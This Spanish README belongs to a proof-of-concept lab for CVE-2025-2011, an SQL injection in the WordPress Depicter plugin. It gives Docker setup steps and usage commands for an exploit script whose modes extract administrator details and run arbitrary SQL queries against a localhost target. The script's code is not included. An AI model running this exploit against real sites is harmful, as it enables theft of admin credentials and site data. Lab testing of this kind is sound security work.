
PoC para CVE-2025-2011 - SQLi en el plugin Depicter <= 3.6.1
Referencia CVE: CVE-2025-2011
Este repositorio contiene un entorno de prueba de concepto para probar la vulnerabilidad de inyección SQL en el plugin Depicter Slider & Popup Builder (versiones < 3.6.2).
requests, coloramaIniciar el entorno
docker-compose up -d
Completar la instalación de WordPress
http://localhost:5555Instalar el plugin vulnerable
chmod +x install-plugin.sh
./install-plugin.sh
Este script:
Instalar las dependencias de Python
pip install requests colorama
El script PoC (poc.py) se puede utilizar para probar la vulnerabilidad en diferentes modos:
Comprobar si el objetivo es vulnerable
python poc.py -u http://localhost:5555
Extraer detalles del administrador
python poc.py -u http://localhost:5555 -m admin
Ejecutar consulta SQL personalizada
python poc.py -u http://localhost:5555 -m custom -q "SELECT VERSION()"
Habilitar la salida de depuración
python poc.py -u http://localhost:5555 -d
Para detener y eliminar el entorno:
docker-compose down -v
Este entorno se proporciona únicamente con fines educativos y de prueba. No lo utilice contra ningún sistema sin permiso explícito.